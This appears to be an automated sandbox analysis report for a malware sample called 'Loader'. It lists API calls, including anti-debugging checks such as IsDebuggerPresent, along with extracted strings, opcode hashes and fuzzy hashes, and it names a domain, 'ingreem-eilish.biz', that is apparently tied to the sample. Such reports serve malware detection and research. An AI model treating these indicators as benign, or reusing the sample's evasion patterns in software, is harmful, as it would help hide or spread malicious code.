                                                                                          • Part of subcall function 0043C330: LdrInitializeThunk.NTDLL(0043E40B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C35E
                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041A7FA
                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041A89B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary$InitializeThunk
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 011C47C8
• IsDebuggerPresent.KERNEL32 ref: 011C4894
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 011C48AD
• UnhandledExceptionFilter.KERNEL32(?), ref: 011C48B7
Memory Dump Source
• Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: a7d96cb1e2d558c8280ff9b68b85d891296b3ea81b2c8327dba79c6ca80b74c4
• Instruction ID: b0f13fe9655b6acfa788fababa438da2a8c0595fb022619199caeb1e87aca2f6
• Opcode Fuzzy Hash: a7d96cb1e2d558c8280ff9b68b85d891296b3ea81b2c8327dba79c6ca80b74c4
• Instruction Fuzzy Hash: 50311875D062299BDF21EFA4D9497CDBBB8AF18704F1041AAE40CAB240EB709A84CF45
APIs
• GetSystemTimeAsFileTime.KERNEL32(?), ref: 011C46B5
• GetCurrentThreadId.KERNEL32 ref: 011C46C4
• GetCurrentProcessId.KERNEL32 ref: 011C46CD
• QueryPerformanceCounter.KERNEL32(?), ref: 011C46DA
Memory Dump Source
• Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 9a636d5796887f43aa66b35729ae550750b6e45f9f73b07dca059b58692eeb33
• Instruction ID: c037ae53e2741cfe5d1e278cccd328068a01863ae5e71d1cc9f2f688d72b6fda
• Opcode Fuzzy Hash: 9a636d5796887f43aa66b35729ae550750b6e45f9f73b07dca059b58692eeb33
• Instruction Fuzzy Hash: 1CF06774D1220DEBCB14EBB4D6899DEB7F4FF1C204B5145A6A412E7104E734A7849F50
Strings
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID:
• String ID: "=$5$&[da$'%.W$\X
• API String ID: 0-3996675343
• Opcode ID: 72735fe613da29a2a9f30f99bcf3e8ab70917fe6899e91424263f497d90dfd44
• Instruction ID: 1f7b9d891a837fd2c1889f1d16761606eef6dcf163077f6c21b04c916aa521c0
• Opcode Fuzzy Hash: 72735fe613da29a2a9f30f99bcf3e8ab70917fe6899e91424263f497d90dfd44
• Instruction Fuzzy Hash: E662597450C3919BC321CF25C8506ABBFE1AF95314F1887BEE8E44B392D7398946C796
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-3916222277
• Opcode ID: e1c78a85c073594b75890c03197e051504a5e28f3cbe51423f7dbecb5aa6b388
• Instruction ID: 9919e99d947470de0ad43a1edc8932ab1666953d7c59876c21ae7e6382b5c0c6
• Opcode Fuzzy Hash: e1c78a85c073594b75890c03197e051504a5e28f3cbe51423f7dbecb5aa6b388
• Instruction Fuzzy Hash: 735161B4E152189FDB40EFACD98569DBBF0BB88300F114529E498E7360D734AD84CF96
Strings
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID:
• String ID: 255B$8A23$C566$E5E1
• API String ID: 0-3367982953
• Opcode ID: f0eae71c9d6d3c7835d1a474653f2e65b944a28a3ad533d021ed57ddccbba122
• Instruction ID: c9ab22a39130a17e05ee61a651d87010c03896c5afd99520b9bc1921e18da37f
• Opcode Fuzzy Hash: f0eae71c9d6d3c7835d1a474653f2e65b944a28a3ad533d021ed57ddccbba122
• Instruction Fuzzy Hash: 03A12B316593924BD3348B258C91BEBBBE1EBD2314F088A7DD4D897792F73848069792
Strings
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID:
• String ID: XY$AC$IK$MO
• API String ID: 0-664538580
• Opcode ID: af46b7993aa1ccbcd2e1645b036d6b68a91456e6c26b5bb98e83f5d9dfdf7b8c
• Instruction ID: 39428194e500b5a53c6aae23f15327502ea0c60e828c0b8a3651ea1546d1f37d
• Opcode Fuzzy Hash: af46b7993aa1ccbcd2e1645b036d6b68a91456e6c26b5bb98e83f5d9dfdf7b8c
• Instruction Fuzzy Hash: 9A8124B6A09310DFD7109F25E84172FB7E1ABC5304F154A3EE98597381EB38E9058B8B
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID: Uninitialize
• String ID: D$ingreem-eilish.biz
• API String ID: 3861434553-1775330692
• Opcode ID: 1a2b36ded3d63c48934e883b06f9b4d8cc45036b94076ba770b07ddeb3608e72
• Instruction ID: 22ccddc28fc708269306c978beef408f1ed5ca82190ea807a368fb49a74d3678
• Opcode Fuzzy Hash: 1a2b36ded3d63c48934e883b06f9b4d8cc45036b94076ba770b07ddeb3608e72
• Instruction Fuzzy Hash: 5BA1F17550C3928BD739CF268450BEBBBE2AFE2300F18896DD0D55B392D7790906CB96
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 011C8CDC
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 011C8CE6
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 011C8CF3
Memory Dump Source
• Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 00981c66348ef0b40980e0599513f82ba3030a5fc14f887ac0b7f6b99a15c40c
• Instruction ID: 3975b60bd4dc0c5d8961d89020e3bd2951ce568611fdd286b67ab9a976b19b5d
• Opcode Fuzzy Hash: 00981c66348ef0b40980e0599513f82ba3030a5fc14f887ac0b7f6b99a15c40c
• Instruction Fuzzy Hash: AA31E87490122DABCB25DF68D8887DDBBB8BF18710F5041EAE41CA7250E7709F858F45
Strings
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID:
• String ID: :>8.$=81;$SO
• API String ID: 0-596420614
• Opcode ID: b862dca480a246b022d7e0da2e616d285275df2dc89570896f01fd18fba204d9
• Instruction ID: e0f39ee0ef8aad66e5f4eb59653e3d911f017b98dc62c0ad19d3a25678c4c286
• Opcode Fuzzy Hash: b862dca480a246b022d7e0da2e616d285275df2dc89570896f01fd18fba204d9
• Instruction Fuzzy Hash: B81233B1A0C351CBC7148F25E84166BBBE1EF86318F18886EE5D58B342E739D906CB57
Strings
Memory Dump Source
• Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
Similarity
• API ID:
• String ID: =$W<$].
• API String ID: 0-346867940
• Opcode ID: 8b8bc62358491bb0bb9e4ed2def56676a28b6e9853effc2d684f76f6b0b2f10f
• Instruction ID: 62d96ae4b2894c4899798aef787fca2a9be0c63ec6b680157ec9a328cbfb3df3
• Opcode Fuzzy Hash: 8b8bc62358491bb0bb9e4ed2def56676a28b6e9853effc2d684f76f6b0b2f10f
• Instruction Fuzzy Hash: C0029D32A433558FC32CDE6DF9D21A4B7E4F79832974442BBD968CB2C8E3655889D780
Strings
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID:
• String ID: M99$M99${
• API String ID: 0-726366120
• Opcode ID: 4518d23ef3c3a1572746b5f32e4e7f738ad1ec23c563525293a5832030b7192f
• Instruction ID: f63e886754d2f8b0a4918178e697645c79cb63f24128d1e0e3a60bf90f675cf0
• Opcode Fuzzy Hash: 4518d23ef3c3a1572746b5f32e4e7f738ad1ec23c563525293a5832030b7192f
• Instruction Fuzzy Hash: 76E1F675208381CBD724CF28D8957EBBBE2EFD5304F18886DE4D987292D7389846CB56
Strings
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID:
• String ID: LoWf$dUgS$y}zN
• API String ID: 0-3353942304
• Opcode ID: c56ece68d25b053fc45e7bbabff213bb9af3a884a6344b36a553f0283c3d2f6e
• Instruction ID: 9afdd42b56ae40ab4dd5e281407d5461c0fd8baedc768c94432ec64788af82fb
• Opcode Fuzzy Hash: c56ece68d25b053fc45e7bbabff213bb9af3a884a6344b36a553f0283c3d2f6e
• Instruction Fuzzy Hash: 60E13775609391CFD714CF28E8A071EBBE2FF8A314F45866DE4955B3A2C7349940CB4A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: T$(
                                                                                        • API String ID: 0-912061130
                                                                                        • Opcode ID: 798c944a0b5ea13ddaf8aa9a95a2fe42bedcd817a1115da83d9037213bbee807
                                                                                        • Instruction ID: 93989ace4de276bdb8e310f1c7634ed97050259def6c9c4e49c5709f4a117206
                                                                                        • Opcode Fuzzy Hash: 798c944a0b5ea13ddaf8aa9a95a2fe42bedcd817a1115da83d9037213bbee807
                                                                                        • Instruction Fuzzy Hash: 6EB29032E022598FCB18CFADE8925EDBBF4FB58324B04417AD868E7384E3355985DB50
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0$8
                                                                                        • API String ID: 0-46163386
                                                                                        • Opcode ID: fd3430a49e53e44d2c1b800aecf7f30112ca0deec01d32340aaa44e71317447b
                                                                                        • Instruction ID: b632590525e39ce5a857bdb2105f3f6bf93eafba229eb97f7c3f587b0413ca56
                                                                                        • Opcode Fuzzy Hash: fd3430a49e53e44d2c1b800aecf7f30112ca0deec01d32340aaa44e71317447b
                                                                                        • Instruction Fuzzy Hash: B17245716083409FDB14CF18C884BABBBE1EF84314F04892EF9899B391D779D949CB96
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit
                                                                                        • String ID:
                                                                                        • API String ID: 2610073882-0
                                                                                        • Opcode ID: 9c25163ce398a7b029c4444921b319866883930bdaffdc4c83f29d4f0e634296
                                                                                        • Instruction ID: 6ba9ae55c9c609b8c98ae8d3013d17b988d2f3c8137f657ab236dd5297d85bd1
                                                                                        • Opcode Fuzzy Hash: 9c25163ce398a7b029c4444921b319866883930bdaffdc4c83f29d4f0e634296
                                                                                        • Instruction Fuzzy Hash: E7515D61208FC18ED321CB388848387BFD26B67214F498A9CD1FE8B3D6DB756549C762
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: K%$wY
                                                                                        • API String ID: 0-861939988
                                                                                        • Opcode ID: 4c105dcb673ca409fed3b26638ef582e7e71751691f37f625785e2df2b92ac95
                                                                                        • Instruction ID: 972d4f943efe6639fd8cdc6de93a4f537478db6c0949f012f7129216f2549232
                                                                                        • Opcode Fuzzy Hash: 4c105dcb673ca409fed3b26638ef582e7e71751691f37f625785e2df2b92ac95
                                                                                        • Instruction Fuzzy Hash: 17E144B55183008BD3149F28D8917ABB3E0FFD6314F19892EE8C597391E738D986C79A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: )$IEND
                                                                                        • API String ID: 0-707183367
                                                                                        • Opcode ID: 1b6de2c190c02fbea61387cb34139e6b47e564e05f79e2f2ac439f578bf2f602
                                                                                        • Instruction ID: 9e91746e592093abc6b78d22eaac013f7dd1cf175606ed20a1766aa15e76428f
                                                                                        • Opcode Fuzzy Hash: 1b6de2c190c02fbea61387cb34139e6b47e564e05f79e2f2ac439f578bf2f602
                                                                                        • Instruction Fuzzy Hash: 03D1BFB1A083449FD710DF14D84575BBBE4ABD4308F14492EFA99AB3C2E379E904CB96
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: e>3@$i>3@
                                                                                        • API String ID: 2994545307-675609054
                                                                                        • Opcode ID: 1779fb8af645c331d5a66977d562ed93066847e2f24aa5bb139e768eaa31bd98
                                                                                        • Instruction ID: d63809bf3076d72f070bdb060dff65e02fc893e24afa0153ad856657245a98a7
                                                                                        • Opcode Fuzzy Hash: 1779fb8af645c331d5a66977d562ed93066847e2f24aa5bb139e768eaa31bd98
                                                                                        • Instruction Fuzzy Hash: 83A1F436A083119BC724DF18C88092BB7E2FF9C710F19947DE8869B365DB35AC55CB86
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !LDw$D
                                                                                        • API String ID: 0-631248872
                                                                                        • Opcode ID: dc6169488d60e39e14afbbbe44962d8ec75923c6dd643a2a98093ad71e27ba6d
                                                                                        • Instruction ID: 7e09ab24442d4b71b88b13391f34237f2dfc9f095084ee9819a17599225fc662
                                                                                        • Opcode Fuzzy Hash: dc6169488d60e39e14afbbbe44962d8ec75923c6dd643a2a98093ad71e27ba6d
                                                                                        • Instruction Fuzzy Hash: BCA1A1B0118340CFD724DF24C8A1BABBBF1FF96305F09595DE48A4B2A2E7798945CB46
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: bBB$rBB
                                                                                        • API String ID: 0-3277761424
                                                                                        • Opcode ID: bb51691f9dde2279535c869879990e0e1ffd92db3571b05c63e2572ef1324b61
                                                                                        • Instruction ID: be6856a020535e4a6e683abf22a1b7757c0c9bd1d2ca0ad35f5e609e3485cc7a
